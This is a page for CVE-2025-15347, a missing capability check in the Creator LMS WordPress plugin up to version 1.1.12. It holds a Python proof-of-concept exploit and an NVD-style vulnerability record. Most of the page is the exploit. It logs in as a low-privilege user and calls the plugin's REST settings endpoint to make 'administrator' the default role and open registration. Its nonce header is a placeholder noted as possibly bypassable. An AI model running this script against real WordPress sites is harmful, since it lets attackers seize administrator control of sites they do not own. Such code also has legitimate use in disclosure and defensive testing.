CVE-2025-15347

import requests import json # CVE-2025-15347 PoC - Creator LMS Privilege Escalation # Target: WordPress site with Creator LMS plugin <= 1.1.12 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker_account" PASSWORD = "attacker_password" def get_auth_cookie(): """Authenticate and get WordPress session cookie""" login_url = f"{TARGET_URL}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } response = session.post(login_url, data=login_data) return session.cookies.get_dict() def exploit_privilege_escalation(cookies): """Exploit CVE-2025-15347 to change WordPress options""" # REST API endpoint for Creator LMS settings api_url = f"{TARGET_URL}/wp-json/creatorlms/v1/settings" # Malicious payload - change default role to administrator payload = { 'default_role': 'administrator', 'users_can_register': '1' } headers = { 'Content-Type': 'application/json', 'X-WP-Nonce': 'required-nonce' # May be missing or bypassable } # Send request to modify options response = requests.post( api_url, json=payload, cookies=cookies, headers=headers ) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") return response.status_code == 200 if __name__ == "__main__": print("[*] CVE-2025-15347 Exploitation") cookies = get_auth_cookie() if cookies: print("[+] Authentication successful") if exploit_privilege_escalation(cookies): print("[+] Privilege escalation successful!") print("[+] Default role changed to administrator")

{"cve": {"id": "CVE-2025-15347", "sourceIdentifier": "[email protected]", "published": "2026-01-20T15:16:15.553", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Creator LMS – The LMS for Creators, Coaches, and Trainers plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check in the get_items_permissions_check function in all versions up to, and including, 1.1.12. This makes it possible for authenticated attackers, with contributor level access and above, to update arbitrary WordPress options."}, {"lang": "es", "value": "El plugin The Creator LMS – The LMS para Creators, Coaches, and Trainers para WordPress es vulnerable a la modificación no autorizada de datos que puede conducir a una escalada de privilegios debido a una comprobación de capacidad faltante en la función get_items_permissions_check en todas las versiones hasta la 1.1.12, inclusive. Esto permite a atacantes autenticados, con acceso de nivel de colaborador y superior, actualizar opciones arbitrarias de WordPress."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3433193/creatorlms/tags/1.1.13/includes/Rest/V1/SettingsController.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4bddaefc-9ddc-4798-acb6-7b87f7c924a1?source=cve", "source": "[email protected]"}]}}